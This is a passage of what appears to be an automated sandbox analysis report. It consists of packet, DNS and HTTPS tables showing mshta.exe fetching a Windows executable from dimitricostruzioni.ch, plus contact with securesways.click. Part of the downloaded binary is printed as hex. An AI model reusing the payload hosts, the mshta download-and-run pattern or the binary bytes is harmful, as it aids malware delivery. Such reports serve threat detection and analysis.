                                                                                                                                                                                                                                              Dec 21, 2024 14:59:56.940237999 CET49803443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:56.942368031 CET49803443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:56.942408085 CET44349803104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:56.942435980 CET49803443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:56.942451000 CET44349803104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:56.950618029 CET49815443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:56.950654030 CET44349815104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:56.950753927 CET49815443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:56.951709032 CET49815443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:56.951725006 CET44349815104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:58.175151110 CET44349815104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:58.175251961 CET49815443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:58.189462900 CET49815443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:58.189486027 CET44349815104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:58.190341949 CET44349815104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:58.192594051 CET49815443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:58.192594051 CET49815443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:58.192764997 CET44349815104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:59.025609016 CET44349815104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:59.025760889 CET44349815104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:59.025808096 CET49815443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:59.025819063 CET44349815104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:59.025923014 CET44349815104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:59.025969982 CET49815443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:59.025976896 CET44349815104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:59.033621073 CET44349815104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:59.033668041 CET49815443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:59.033674002 CET44349815104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:59.041825056 CET44349815104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:59.041871071 CET49815443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:59.041877031 CET44349815104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:59.050106049 CET44349815104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:59.050165892 CET49815443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:59.050170898 CET44349815104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:59.100615978 CET49815443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:59.145778894 CET44349815104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:59.194367886 CET49815443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:59.217104912 CET44349815104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:59.221282005 CET44349815104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:59.221338034 CET49815443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:59.221349955 CET44349815104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:59.221652985 CET44349815104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:59.221715927 CET49815443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:59.221910000 CET49815443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:59.221924067 CET44349815104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:59.221934080 CET49815443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:59.221940041 CET44349815104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:59.576562881 CET49821443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:59.576649904 CET44349821104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:59.576751947 CET49821443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:59.577424049 CET49821443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:59.577470064 CET44349821104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:00.799375057 CET44349821104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:00.799468040 CET49821443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:00.800719976 CET49821443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:00.800736904 CET44349821104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:00.801776886 CET44349821104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:00.802969933 CET49821443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:00.803133965 CET49821443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:00.803179979 CET44349821104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:02.191171885 CET44349821104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:02.191509962 CET44349821104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:02.191983938 CET49821443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:02.192161083 CET49821443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:02.192204952 CET44349821104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:02.374021053 CET49832443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:02.374072075 CET44349832104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:02.374178886 CET49832443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:02.374510050 CET49832443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:02.374548912 CET44349832104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:03.593771935 CET44349832104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:03.593869925 CET49832443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:03.595197916 CET49832443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:03.595206022 CET44349832104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:03.595544100 CET44349832104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:03.596810102 CET49832443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:03.597232103 CET49832443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:03.597265959 CET44349832104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:03.597434044 CET49832443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:03.643328905 CET44349832104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:04.539370060 CET44349832104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:04.539434910 CET44349832104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:04.539499998 CET49832443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:04.539684057 CET49832443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:04.539693117 CET44349832104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:04.858194113 CET49838443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:04.858239889 CET44349838104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:04.858503103 CET49838443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:04.858649015 CET49838443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:04.858675957 CET44349838104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:06.068619967 CET44349838104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:06.068835020 CET49838443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:06.070029974 CET49838443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:06.070044041 CET44349838104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:06.070278883 CET44349838104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:06.071541071 CET49838443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:06.071715117 CET49838443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:06.071763039 CET44349838104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:06.071837902 CET49838443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:06.071854115 CET44349838104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:09.363256931 CET44349838104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:09.363354921 CET44349838104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:09.363662958 CET49838443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:09.363662958 CET49838443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:09.663183928 CET49838443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:09.663280964 CET44349838104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:09.865597963 CET49849443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:09.865695953 CET44349849104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:09.865792990 CET49849443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:09.866112947 CET49849443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:09.866149902 CET44349849104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:11.085625887 CET44349849104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:11.085707903 CET49849443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:11.086920023 CET49849443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:11.086941004 CET44349849104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:11.087363005 CET44349849104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:11.088514090 CET49849443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:11.088613033 CET49849443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:11.088627100 CET44349849104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:12.280474901 CET44349849104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:12.280574083 CET44349849104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:12.280774117 CET49849443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:12.281071901 CET49849443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:12.281095028 CET44349849104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:12.753213882 CET49855443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:12.753269911 CET44349855104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:12.753355026 CET49855443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:12.753627062 CET49855443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:12.753652096 CET44349855104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:13.970848083 CET44349855104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:13.970948935 CET49855443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:13.972238064 CET49855443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:13.972255945 CET44349855104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:13.973048925 CET44349855104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:13.974308014 CET49855443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:13.974879980 CET49855443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:13.974919081 CET44349855104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:13.975138903 CET49855443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:13.975178003 CET44349855104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:13.976130962 CET49855443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:13.976180077 CET44349855104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:13.977463007 CET49855443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:13.977507114 CET44349855104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:13.977674961 CET49855443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:13.977715969 CET44349855104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:13.977895021 CET49855443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:13.977929115 CET44349855104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:13.977938890 CET49855443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:13.977955103 CET44349855104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:13.978123903 CET49855443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:13.978154898 CET44349855104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:13.978182077 CET49855443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:13.978403091 CET49855443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:14.019429922 CET44349855104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:17.661894083 CET44349855104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:17.662031889 CET44349855104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:17.662231922 CET49855443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:17.662508011 CET49855443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:17.662548065 CET44349855104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:17.730932951 CET49871443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:17.731056929 CET44349871104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:17.731154919 CET49871443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:17.731508970 CET49871443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:17.731544971 CET44349871104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:18.946357012 CET44349871104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:18.946470976 CET49871443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:18.947648048 CET49871443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:18.947666883 CET44349871104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:18.947994947 CET44349871104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:18.949604034 CET49871443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:18.949642897 CET49871443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:18.949695110 CET44349871104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:19.811660051 CET44349871104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:19.811795950 CET44349871104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:19.811882019 CET49871443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:19.812175035 CET49871443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:19.812220097 CET44349871104.21.16.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:19.812248945 CET49871443192.168.2.5104.21.16.1
                                                                                                                                                                                                                                              Dec 21, 2024 15:00:19.812263966 CET44349871104.21.16.1192.168.2.5

                                                                                                                                                                                                                                              UDP Packets

                                                                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:00.548774958 CET4993553192.168.2.51.1.1.1
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:01.380871058 CET53499351.1.1.1192.168.2.5
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:20.521310091 CET5885553192.168.2.51.1.1.1
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:36.226567984 CET6177553192.168.2.51.1.1.1
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:50.163650036 CET5330753192.168.2.51.1.1.1
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:52.458853960 CET5529553192.168.2.51.1.1.1
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:52.788829088 CET53552951.1.1.1192.168.2.5

                                                                                                                                                                                                                                              DNS Queries

                                                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:00.548774958 CET192.168.2.51.1.1.10x7a28Standard query (0)dimitricostruzioni.chA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:20.521310091 CET192.168.2.51.1.1.10xb18dStandard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:36.226567984 CET192.168.2.51.1.1.10x1eecStandard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:50.163650036 CET192.168.2.51.1.1.10x3e4aStandard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:52.458853960 CET192.168.2.51.1.1.10xc7c9Standard query (0)securesways.clickA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                              DNS Answers

                                                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:01.380871058 CET1.1.1.1192.168.2.50x7a28No error (0)dimitricostruzioni.ch62.182.21.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:16.995680094 CET1.1.1.1192.168.2.50xb901No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:16.995680094 CET1.1.1.1192.168.2.50xb901No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:20.660690069 CET1.1.1.1192.168.2.50xb18dNo error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:36.366405964 CET1.1.1.1192.168.2.50x1eecNo error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:50.391271114 CET1.1.1.1192.168.2.50x3e4aNo error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:52.788829088 CET1.1.1.1192.168.2.50xc7c9No error (0)securesways.click104.21.16.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:52.788829088 CET1.1.1.1192.168.2.50xc7c9No error (0)securesways.click104.21.96.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:52.788829088 CET1.1.1.1192.168.2.50xc7c9No error (0)securesways.click104.21.32.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:52.788829088 CET1.1.1.1192.168.2.50xc7c9No error (0)securesways.click104.21.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:52.788829088 CET1.1.1.1192.168.2.50xc7c9No error (0)securesways.click104.21.80.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:52.788829088 CET1.1.1.1192.168.2.50xc7c9No error (0)securesways.click104.21.48.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Dec 21, 2024 14:59:52.788829088 CET1.1.1.1192.168.2.50xc7c9No error (0)securesways.click104.21.64.1A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                              HTTP Request Dependency Graph

                                                                                                                                                                                                                                              • dimitricostruzioni.ch
                                                                                                                                                                                                                                              • securesways.click

                                                                                                                                                                                                                                              HTTPS Proxied Packets

                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              0192.168.2.54970462.182.21.1054435832C:\Windows\System32\mshta.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-12-21 13:59:03 UTC340OUTGET /documentcomplie HTTP/1.1
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Accept-Language: en-CH
                                                                                                                                                                                                                                              UA-CPU: AMD64
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                                                              Host: dimitricostruzioni.ch
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              2024-12-21 13:59:03 UTC364INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              last-modified: Fri, 20 Dec 2024 17:42:35 GMT
                                                                                                                                                                                                                                              accept-ranges: bytes
                                                                                                                                                                                                                                              content-length: 473509
                                                                                                                                                                                                                                              date: Sat, 21 Dec 2024 13:59:03 GMT
                                                                                                                                                                                                                                              server: LiteSpeed
                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                                                                                                                                              2024-12-21 13:59:03 UTC16384INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a0 52 e6 d8 e4 33 88 8b e4 33 88 8b e4 33 88 8b 00 43 8b 8a e7 33 88 8b 00 43 8c 8a fc 33 88 8b 00 43 8d 8a e3 33 88 8b 00 43 89 8a f9 33 88 8b e4 33 89 8b cd 32 88 8b 00 43 80 8a f0 33 88 8b 00 43 77 8b e5 33 88 8b 00 43 8a 8a e5 33 88 8b 52 69 63 68 e4 33 88 8b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 fd b9 f0 9e 00 00 00
                                                                                                                                                                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$R333C3C3C3C332C3Cw3C3Rich3PEL
                                                                                                                                                                                                                                              2024-12-21 13:59:03 UTC16384INData Raw: cc cc cc 8b ff 55 8b ec 51 8b 45 08 53 56 8b f1 57 89 86 a4 00 00 00 8b 45 0c 89 86 a8 00 00 00 ff 15 94 21 41 00 ff 75 18 8b 86 a4 00 00 00 33 db 53 53 53 ff 70 04 8b ce ff 15 a4 21 41 00 8b f8 85 ff 0f 88 ce 00 00 00 6a 01 8b ce ff 15 94 20 41 00 8b f8 85 ff 0f 88 ba 00 00 00 6a 01 8b ce ff 15 98 20 41 00 8b f8 85 ff 0f 88 a6 00 00 00 8b 8e a4 00 00 00 56 ff 15 48 21 41 00 6a 01 8b ce ff 15 24 21 41 00 8d 45 fc 50 ff 15 bc 20 41 00 8b f8 85 ff 78 7f ff 75 fc 8b ce ff 15 9c 20 41 00 8b f8 85 ff 79 0b 8b 4d fc ff 15 c0 20 41 00 eb 63 6a 10 bf 05 40 00 80 e8 c3 9c 00 00 8b d0 59 85 d2 74 14 8b 8e a4 00 00 00 8b 49 04 89 5a 04 89 5a 08 89 4a 0c eb 02 8b d3 89 96 ac 00 00 00 85 d2 74 30 53 8d 45 fc 8b ca 50 0f b7 45 10 53 56 68 90 16 40 00 50 ff b6 a8 00 00
                                                                                                                                                                                                                                              Data Ascii: UQESVWE!Au3SSSp!Aj Aj AVH!Aj$!AEP Axu AyM Acj@YtIZZJt0SEPESVh@P
